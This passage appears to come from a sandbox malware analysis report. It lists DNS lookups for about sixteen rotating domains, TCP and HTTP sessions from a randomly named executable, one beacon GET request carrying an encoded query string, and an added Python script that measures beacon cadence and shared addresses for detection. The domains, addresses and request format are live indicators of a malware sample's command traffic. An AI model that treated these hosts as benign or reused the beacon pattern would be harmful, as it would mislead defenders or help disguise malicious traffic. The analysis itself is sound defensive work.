                                                                                    Jan 9, 2025 16:59:03.662564993 CET4990180192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:59:04.680874109 CET4990280192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:59:05.037100077 CET8049902160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:59:05.037357092 CET4990280192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:59:05.045717001 CET4990280192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:59:05.401475906 CET8049902160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:59:05.402046919 CET8049902160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:59:05.402055979 CET8049902160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:59:05.402066946 CET8049902160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:59:05.402450085 CET4990280192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:59:05.405189037 CET4990280192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:59:05.760760069 CET8049902160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:59:10.413790941 CET4990380192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:10.532928944 CET8049903172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:59:10.533121109 CET4990380192.168.11.30172.67.132.227
Jan 9, 2025 16:59:10.546438932 CET | 49903 | 80 | 192.168.11.30 | 172.67.132.227
Jan 9, 2025 16:59:10.665621996 CET | 80 | 49903 | 172.67.132.227 | 192.168.11.30
Jan 9, 2025 16:59:10.674277067 CET | 80 | 49903 | 172.67.132.227 | 192.168.11.30
Jan 9, 2025 16:59:10.674307108 CET | 80 | 49903 | 172.67.132.227 | 192.168.11.30
Jan 9, 2025 16:59:10.674523115 CET | 49903 | 80 | 192.168.11.30 | 172.67.132.227
Jan 9, 2025 16:59:12.051306009 CET | 49903 | 80 | 192.168.11.30 | 172.67.132.227
Jan 9, 2025 16:59:13.070178986 CET | 49904 | 80 | 192.168.11.30 | 172.67.132.227
Jan 9, 2025 16:59:13.189215899 CET | 80 | 49904 | 172.67.132.227 | 192.168.11.30
Jan 9, 2025 16:59:13.189428091 CET | 49904 | 80 | 192.168.11.30 | 172.67.132.227
Jan 9, 2025 16:59:13.202044964 CET | 49904 | 80 | 192.168.11.30 | 172.67.132.227
Jan 9, 2025 16:59:13.320997953 CET | 80 | 49904 | 172.67.132.227 | 192.168.11.30
Jan 9, 2025 16:59:13.329472065 CET | 80 | 49904 | 172.67.132.227 | 192.168.11.30
Jan 9, 2025 16:59:13.329734087 CET | 80 | 49904 | 172.67.132.227 | 192.168.11.30
Jan 9, 2025 16:59:13.329885006 CET | 49904 | 80 | 192.168.11.30 | 172.67.132.227
Jan 9, 2025 16:59:14.706902027 CET | 49904 | 80 | 192.168.11.30 | 172.67.132.227
Jan 9, 2025 16:59:15.725006104 CET | 49905 | 80 | 192.168.11.30 | 172.67.132.227
Jan 9, 2025 16:59:15.844558001 CET | 80 | 49905 | 172.67.132.227 | 192.168.11.30
Jan 9, 2025 16:59:15.844764948 CET | 49905 | 80 | 192.168.11.30 | 172.67.132.227
Jan 9, 2025 16:59:15.861751080 CET | 49905 | 80 | 192.168.11.30 | 172.67.132.227
Jan 9, 2025 16:59:15.861814022 CET | 49905 | 80 | 192.168.11.30 | 172.67.132.227
Jan 9, 2025 16:59:15.981417894 CET | 80 | 49905 | 172.67.132.227 | 192.168.11.30
Jan 9, 2025 16:59:15.981677055 CET | 80 | 49905 | 172.67.132.227 | 192.168.11.30
Jan 9, 2025 16:59:15.987556934 CET | 80 | 49905 | 172.67.132.227 | 192.168.11.30
Jan 9, 2025 16:59:15.987782001 CET | 80 | 49905 | 172.67.132.227 | 192.168.11.30
Jan 9, 2025 16:59:15.987992048 CET | 49905 | 80 | 192.168.11.30 | 172.67.132.227
Jan 9, 2025 16:59:17.378173113 CET | 49905 | 80 | 192.168.11.30 | 172.67.132.227
Jan 9, 2025 16:59:18.396419048 CET | 49906 | 80 | 192.168.11.30 | 172.67.132.227
Jan 9, 2025 16:59:18.515754938 CET | 80 | 49906 | 172.67.132.227 | 192.168.11.30
Jan 9, 2025 16:59:18.515959978 CET | 49906 | 80 | 192.168.11.30 | 172.67.132.227
Jan 9, 2025 16:59:18.525099039 CET | 49906 | 80 | 192.168.11.30 | 172.67.132.227
Jan 9, 2025 16:59:18.644506931 CET | 80 | 49906 | 172.67.132.227 | 192.168.11.30
Jan 9, 2025 16:59:18.657053947 CET | 80 | 49906 | 172.67.132.227 | 192.168.11.30
Jan 9, 2025 16:59:18.658138990 CET | 80 | 49906 | 172.67.132.227 | 192.168.11.30
Jan 9, 2025 16:59:18.658329010 CET | 49906 | 80 | 192.168.11.30 | 172.67.132.227
Jan 9, 2025 16:59:18.660294056 CET | 49906 | 80 | 192.168.11.30 | 172.67.132.227
Jan 9, 2025 16:59:18.779665947 CET | 80 | 49906 | 172.67.132.227 | 192.168.11.30
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 9, 2025 16:53:51.084579945 CET | 59565 | 53 | 192.168.11.30 | 1.1.1.1
Jan 9, 2025 16:53:51.543076992 CET | 53 | 59565 | 1.1.1.1 | 192.168.11.30
Jan 9, 2025 16:54:07.090415001 CET | 63896 | 53 | 192.168.11.30 | 1.1.1.1
Jan 9, 2025 16:54:07.410825014 CET | 53 | 63896 | 1.1.1.1 | 192.168.11.30
Jan 9, 2025 16:54:20.775130987 CET | 52211 | 53 | 192.168.11.30 | 1.1.1.1
Jan 9, 2025 16:54:20.903702974 CET | 53 | 52211 | 1.1.1.1 | 192.168.11.30
Jan 9, 2025 16:54:34.572192907 CET | 50897 | 53 | 192.168.11.30 | 1.1.1.1
Jan 9, 2025 16:54:34.742608070 CET | 53 | 50897 | 1.1.1.1 | 192.168.11.30
Jan 9, 2025 16:54:48.269037008 CET | 52490 | 53 | 192.168.11.30 | 1.1.1.1
Jan 9, 2025 16:54:48.452955008 CET | 53 | 52490 | 1.1.1.1 | 192.168.11.30
Jan 9, 2025 16:54:56.517262936 CET | 59266 | 53 | 192.168.11.30 | 1.1.1.1
Jan 9, 2025 16:54:56.806725979 CET | 53 | 59266 | 1.1.1.1 | 192.168.11.30
Jan 9, 2025 16:55:11.670242071 CET | 53398 | 53 | 192.168.11.30 | 1.1.1.1
Jan 9, 2025 16:55:11.856961966 CET | 53 | 53398 | 1.1.1.1 | 192.168.11.30
Jan 9, 2025 16:55:27.182508945 CET | 49689 | 53 | 192.168.11.30 | 1.1.1.1
Jan 9, 2025 16:55:27.831831932 CET | 53 | 49689 | 1.1.1.1 | 192.168.11.30
Jan 9, 2025 16:55:42.241483927 CET | 58475 | 53 | 192.168.11.30 | 1.1.1.1
Jan 9, 2025 16:55:42.407191992 CET | 53 | 58475 | 1.1.1.1 | 192.168.11.30
Jan 9, 2025 16:55:55.660751104 CET | 61435 | 53 | 192.168.11.30 | 1.1.1.1
Jan 9, 2025 16:55:55.782820940 CET | 53 | 61435 | 1.1.1.1 | 192.168.11.30
Jan 9, 2025 16:56:03.846411943 CET | 64555 | 53 | 192.168.11.30 | 1.1.1.1
Jan 9, 2025 16:56:04.425796032 CET | 53 | 64555 | 1.1.1.1 | 192.168.11.30
Jan 9, 2025 16:56:18.218008041 CET | 56097 | 53 | 192.168.11.30 | 1.1.1.1
Jan 9, 2025 16:56:18.806066036 CET | 53 | 56097 | 1.1.1.1 | 192.168.11.30
Jan 9, 2025 16:56:33.151802063 CET | 61554 | 53 | 192.168.11.30 | 1.1.1.1
Jan 9, 2025 16:56:33.398082018 CET | 53 | 61554 | 1.1.1.1 | 192.168.11.30
Jan 9, 2025 16:56:47.727611065 CET | 56280 | 53 | 192.168.11.30 | 1.1.1.1
Jan 9, 2025 16:56:47.992480993 CET | 53 | 56280 | 1.1.1.1 | 192.168.11.30
Jan 9, 2025 16:57:01.598675013 CET | 57226 | 53 | 192.168.11.30 | 1.1.1.1
Jan 9, 2025 16:57:01.725621939 CET | 53 | 57226 | 1.1.1.1 | 192.168.11.30
Jan 9, 2025 16:57:15.252139091 CET | 62390 | 53 | 192.168.11.30 | 1.1.1.1
Jan 9, 2025 16:57:15.440694094 CET | 53 | 62390 | 1.1.1.1 | 192.168.11.30
Jan 9, 2025 16:58:19.533066988 CET | 55239 | 53 | 192.168.11.30 | 1.1.1.1
Jan 9, 2025 16:58:19.707988024 CET | 53 | 55239 | 1.1.1.1 | 192.168.11.30
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 9, 2025 16:53:51.084579945 CET | 192.168.11.30 | 1.1.1.1 | 0x78af | Standard query (0) | www.milp.store | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:07.090415001 CET | 192.168.11.30 | 1.1.1.1 | 0x3e99 | Standard query (0) | www.chiro.live | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:20.775130987 CET | 192.168.11.30 | 1.1.1.1 | 0xffb2 | Standard query (0) | www.mzkd6gp5.top | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:34.572192907 CET | 192.168.11.30 | 1.1.1.1 | 0xe590 | Standard query (0) | www.bokus.site | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:48.269037008 CET | 192.168.11.30 | 1.1.1.1 | 0xf690 | Standard query (0) | www.elettrocoltura.info | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:56.517262936 CET | 192.168.11.30 | 1.1.1.1 | 0x2820 | Standard query (0) | www.givvjn.info | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:55:11.670242071 CET | 192.168.11.30 | 1.1.1.1 | 0x3a90 | Standard query (0) | www.bonheur.tech | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:55:27.182508945 CET | 192.168.11.30 | 1.1.1.1 | 0x19ef | Standard query (0) | www.rpa.asia | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:55:42.241483927 CET | 192.168.11.30 | 1.1.1.1 | 0x32bc | Standard query (0) | www.ogbos88.cyou | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:55:55.660751104 CET | 192.168.11.30 | 1.1.1.1 | 0x7418 | Standard query (0) | www.smartbath.shop | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:56:03.846411943 CET | 192.168.11.30 | 1.1.1.1 | 0xf15c | Standard query (0) | www.100millionjobs.africa | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:56:18.218008041 CET | 192.168.11.30 | 1.1.1.1 | 0x2cbd | Standard query (0) | www.mirenzhibo.net | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:56:33.151802063 CET | 192.168.11.30 | 1.1.1.1 | 0xe71e | Standard query (0) | www.nextlevel.finance | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:56:47.727611065 CET | 192.168.11.30 | 1.1.1.1 | 0xd263 | Standard query (0) | www.furrcali.xyz | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:57:01.598675013 CET | 192.168.11.30 | 1.1.1.1 | 0xaaf | Standard query (0) | www.buyspeechst.shop | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:57:15.252139091 CET | 192.168.11.30 | 1.1.1.1 | 0xd22e | Standard query (0) | www.lejgnu.info | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:58:19.533066988 CET | 192.168.11.30 | 1.1.1.1 | 0x316e | Standard query (0) | www.elettrocoltura.info | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 9, 2025 16:53:51.543076992 CET | 1.1.1.1 | 192.168.11.30 | 0x78af | No error (0) | www.milp.store | | 194.9.94.85 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:53:51.543076992 CET | 1.1.1.1 | 192.168.11.30 | 0x78af | No error (0) | www.milp.store | | 194.9.94.86 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:07.410825014 CET | 1.1.1.1 | 192.168.11.30 | 0x3e99 | No error (0) | www.chiro.live | | 45.33.2.79 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:07.410825014 CET | 1.1.1.1 | 192.168.11.30 | 0x3e99 | No error (0) | www.chiro.live | | 45.56.79.23 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:07.410825014 CET | 1.1.1.1 | 192.168.11.30 | 0x3e99 | No error (0) | www.chiro.live | | 72.14.178.174 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:07.410825014 CET | 1.1.1.1 | 192.168.11.30 | 0x3e99 | No error (0) | www.chiro.live | | 96.126.123.244 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:07.410825014 CET | 1.1.1.1 | 192.168.11.30 | 0x3e99 | No error (0) | www.chiro.live | | 173.255.194.134 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:07.410825014 CET | 1.1.1.1 | 192.168.11.30 | 0x3e99 | No error (0) | www.chiro.live | | 45.79.19.196 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:07.410825014 CET | 1.1.1.1 | 192.168.11.30 | 0x3e99 | No error (0) | www.chiro.live | | 45.33.30.197 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:07.410825014 CET | 1.1.1.1 | 192.168.11.30 | 0x3e99 | No error (0) | www.chiro.live | | 198.58.118.167 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:07.410825014 CET | 1.1.1.1 | 192.168.11.30 | 0x3e99 | No error (0) | www.chiro.live | | 45.33.18.44 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:07.410825014 CET | 1.1.1.1 | 192.168.11.30 | 0x3e99 | No error (0) | www.chiro.live | | 45.33.23.183 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:07.410825014 CET | 1.1.1.1 | 192.168.11.30 | 0x3e99 | No error (0) | www.chiro.live | | 72.14.185.43 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:07.410825014 CET | 1.1.1.1 | 192.168.11.30 | 0x3e99 | No error (0) | www.chiro.live | | 45.33.20.235 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:20.903702974 CET | 1.1.1.1 | 192.168.11.30 | 0xffb2 | No error (0) | www.mzkd6gp5.top | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:20.903702974 CET | 1.1.1.1 | 192.168.11.30 | 0xffb2 | No error (0) | www.mzkd6gp5.top | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:20.903702974 CET | 1.1.1.1 | 192.168.11.30 | 0xffb2 | No error (0) | www.mzkd6gp5.top | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:20.903702974 CET | 1.1.1.1 | 192.168.11.30 | 0xffb2 | No error (0) | www.mzkd6gp5.top | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:20.903702974 CET | 1.1.1.1 | 192.168.11.30 | 0xffb2 | No error (0) | www.mzkd6gp5.top | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:20.903702974 CET | 1.1.1.1 | 192.168.11.30 | 0xffb2 | No error (0) | www.mzkd6gp5.top | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:20.903702974 CET | 1.1.1.1 | 192.168.11.30 | 0xffb2 | No error (0) | www.mzkd6gp5.top | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:34.742608070 CET | 1.1.1.1 | 192.168.11.30 | 0xe590 | No error (0) | www.bokus.site | | 199.192.21.169 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:48.452955008 CET | 1.1.1.1 | 192.168.11.30 | 0xf690 | Name error (3) | www.elettrocoltura.info | none | none | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:54:56.806725979 CET | 1.1.1.1 | 192.168.11.30 | 0x2820 | No error (0) | www.givvjn.info | | 47.83.1.90 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:55:11.856961966 CET | 1.1.1.1 | 192.168.11.30 | 0x3a90 | No error (0) | www.bonheur.tech | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:55:11.856961966 CET | 1.1.1.1 | 192.168.11.30 | 0x3a90 | No error (0) | www.bonheur.tech | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:55:27.831831932 CET | 1.1.1.1 | 192.168.11.30 | 0x19ef | No error (0) | www.rpa.asia | | 160.25.166.123 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:55:42.407191992 CET | 1.1.1.1 | 192.168.11.30 | 0x32bc | No error (0) | www.ogbos88.cyou | | 172.67.132.227 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:55:42.407191992 CET | 1.1.1.1 | 192.168.11.30 | 0x32bc | No error (0) | www.ogbos88.cyou | | 104.21.13.141 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:55:55.782820940 CET | 1.1.1.1 | 192.168.11.30 | 0x7418 | Name error (3) | www.smartbath.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:56:04.425796032 CET | 1.1.1.1 | 192.168.11.30 | 0xf15c | No error (0) | www.100millionjobs.africa | 100millionjobs.africa | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 16:56:04.425796032 CET | 1.1.1.1 | 192.168.11.30 | 0xf15c | No error (0) | 100millionjobs.africa | | 136.243.64.147 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:56:18.806066036 CET | 1.1.1.1 | 192.168.11.30 | 0x2cbd | No error (0) | www.mirenzhibo.net | | 202.95.11.110 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:56:33.398082018 CET | 1.1.1.1 | 192.168.11.30 | 0xe71e | No error (0) | www.nextlevel.finance | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:56:33.398082018 CET | 1.1.1.1 | 192.168.11.30 | 0xe71e | No error (0) | www.nextlevel.finance | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:56:47.992480993 CET | 1.1.1.1 | 192.168.11.30 | 0xd263 | No error (0) | www.furrcali.xyz | | 103.106.67.112 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:57:01.725621939 CET | 1.1.1.1 | 192.168.11.30 | 0xaaf | No error (0) | www.buyspeechst.shop | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:57:01.725621939 CET | 1.1.1.1 | 192.168.11.30 | 0xaaf | No error (0) | www.buyspeechst.shop | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:57:01.725621939 CET | 1.1.1.1 | 192.168.11.30 | 0xaaf | No error (0) | www.buyspeechst.shop | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:57:01.725621939 CET | 1.1.1.1 | 192.168.11.30 | 0xaaf | No error (0) | www.buyspeechst.shop | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:57:01.725621939 CET | 1.1.1.1 | 192.168.11.30 | 0xaaf | No error (0) | www.buyspeechst.shop | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:57:01.725621939 CET | 1.1.1.1 | 192.168.11.30 | 0xaaf | No error (0) | www.buyspeechst.shop | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:57:01.725621939 CET | 1.1.1.1 | 192.168.11.30 | 0xaaf | No error (0) | www.buyspeechst.shop | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:57:15.440694094 CET | 1.1.1.1 | 192.168.11.30 | 0xd22e | No error (0) | www.lejgnu.info | | 47.83.1.90 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 16:58:19.707988024 CET | 1.1.1.1 | 192.168.11.30 | 0x316e | Name error (3) | www.elettrocoltura.info | none | none | A (IP address) | IN (0x0001) | false
• www.milp.store
• www.chiro.live
• www.mzkd6gp5.top
• www.bokus.site
• www.givvjn.info
• www.bonheur.tech
• www.rpa.asia
• www.ogbos88.cyou
• www.100millionjobs.africa
• www.mirenzhibo.net
• www.nextlevel.finance
• www.furrcali.xyz
• www.buyspeechst.shop
• www.lejgnu.info
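The DNS tables and the host list above show the sample resolving a different name roughly every 14 seconds, two names answering NXDOMAIN, and unrelated names sharing addresses (47.83.1.90 serves both www.givvjn.info and www.lejgnu.info; www.bonheur.tech and www.nextlevel.finance share 13.248.169.48 and 76.223.54.146). The script below is an added example, not part of the Joe Sandbox report, that turns those rows into the checks an analyst would run on them: query cadence, which resolved addresses actually received TCP or HTTP traffic in this section, and which addresses are shared across names. The query and answer tuples are copied from the two tables above; OBSERVED_DST is taken from the TCP and HTTP session rows in this section; the "shared address" pivot and the cadence statistics are this example's heuristics, not a sandbox verdict.

```python
import statistics
from collections import defaultdict

# DNS queries copied from the DNS Queries table of this report: (time of day, queried name).
QUERIES = [
    ("16:53:51.084579945", "www.milp.store"), ("16:54:07.090415001", "www.chiro.live"),
    ("16:54:20.775130987", "www.mzkd6gp5.top"), ("16:54:34.572192907", "www.bokus.site"),
    ("16:54:48.269037008", "www.elettrocoltura.info"), ("16:54:56.517262936", "www.givvjn.info"),
    ("16:55:11.670242071", "www.bonheur.tech"), ("16:55:27.182508945", "www.rpa.asia"),
    ("16:55:42.241483927", "www.ogbos88.cyou"), ("16:55:55.660751104", "www.smartbath.shop"),
    ("16:56:03.846411943", "www.100millionjobs.africa"), ("16:56:18.218008041", "www.mirenzhibo.net"),
    ("16:56:33.151802063", "www.nextlevel.finance"), ("16:56:47.727611065", "www.furrcali.xyz"),
    ("16:57:01.598675013", "www.buyspeechst.shop"), ("16:57:15.252139091", "www.lejgnu.info"),
    ("16:58:19.533066988", "www.elettrocoltura.info"),
]

# Answers copied from the DNS Answers table: (queried name, A-record address); None marks NXDOMAIN.
# The CNAME hop for www.100millionjobs.africa is collapsed onto its final A record.
ANSWERS = [
    ("www.milp.store", "194.9.94.85"), ("www.milp.store", "194.9.94.86"),
    *[("www.chiro.live", ip) for ip in (
        "45.33.2.79", "45.56.79.23", "72.14.178.174", "96.126.123.244", "173.255.194.134", "45.79.19.196",
        "45.33.30.197", "198.58.118.167", "45.33.18.44", "45.33.23.183", "72.14.185.43", "45.33.20.235")],
    *[("www.mzkd6gp5.top", f"104.21.{n}.1") for n in (32, 64, 80, 112, 96, 48, 16)],
    ("www.bokus.site", "199.192.21.169"), ("www.elettrocoltura.info", None),
    ("www.givvjn.info", "47.83.1.90"),
    ("www.bonheur.tech", "13.248.169.48"), ("www.bonheur.tech", "76.223.54.146"),
    ("www.rpa.asia", "160.25.166.123"),
    ("www.ogbos88.cyou", "172.67.132.227"), ("www.ogbos88.cyou", "104.21.13.141"),
    ("www.smartbath.shop", None), ("www.100millionjobs.africa", "136.243.64.147"),
    ("www.mirenzhibo.net", "202.95.11.110"),
    ("www.nextlevel.finance", "13.248.169.48"), ("www.nextlevel.finance", "76.223.54.146"),
    ("www.furrcali.xyz", "103.106.67.112"),
    *[("www.buyspeechst.shop", f"104.21.{n}.1") for n in (32, 64, 16, 80, 96, 48, 112)],
    ("www.lejgnu.info", "47.83.1.90"), ("www.elettrocoltura.info", None),
]

# Destination addresses of the TCP and HTTP sessions shown in this section of the report.
OBSERVED_DST = {"194.9.94.85", "45.33.2.79", "172.67.132.227"}


def parse_ts(ts: str) -> float:
    """'HH:MM:SS.fffffffff' -> seconds since midnight (float keeps the nanosecond digits)."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def query_intervals(queries) -> list:
    """Seconds between consecutive queries, in table order."""
    times = [parse_ts(t) for t, _ in queries]
    return [later - earlier for earlier, later in zip(times, times[1:])]


def build_resolution(answers):
    """Map name -> set of A addresses, and collect the names that came back NXDOMAIN."""
    resolved, nxdomain = defaultdict(set), set()
    for name, addr in answers:
        if addr is None:
            nxdomain.add(name)
        else:
            resolved[name].add(addr)
    return resolved, nxdomain


def shared_infrastructure(answers) -> dict:
    """Addresses returned for more than one queried name: a pivot for finding related C2 names."""
    by_ip = defaultdict(set)
    for name, addr in answers:
        if addr is not None:
            by_ip[addr].add(name)
    return {ip: names for ip, names in by_ip.items() if len(names) > 1}


def summarize(queries, answers, observed_dst) -> dict:
    resolved, nxdomain = build_resolution(answers)
    intervals = query_intervals(queries)
    # A name is "contacted" only if one of its answers appears as a TCP/HTTP destination.
    contacted = {name: sorted(ips & observed_dst) for name, ips in resolved.items() if ips & observed_dst}
    return {
        "distinct_names": len({name for _, name in queries}),
        "median_interval_s": statistics.median(intervals),
        "max_interval_s": max(intervals),
        "nxdomain": sorted(nxdomain),
        "contacted": contacted,
        "shared_ips": shared_infrastructure(answers),
    }


if __name__ == "__main__":
    for key, value in summarize(QUERIES, ANSWERS, OBSERVED_DST).items():
        print(f"{key}: {value}")
```

The cadence figures are what to compare against the process's own timers if you are writing a beaconing detector; the contacted map is the part to export as indicators, since the remaining names in the list were only resolved in this section, not connected to.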
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.30 | 49822 | 194.9.94.85 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 16:53:51.805139065 CET | 533 | OUT | GET /js1x/?80k=lRapCPMXgDk&6B-l7F=YzadGC6YqOgjY/9t8WEBSxHCudcKSJxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswOCkfsfu+tPWB6ee9FA= HTTP/1.1
Host: www.milp.store
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 16:53:52.051402092 CET | 1289 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 09 Jan 2025 15:53:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/8.1.30
Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jan 9, 2025 16:53:52.051500082 CET | 1289 | IN | Data Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
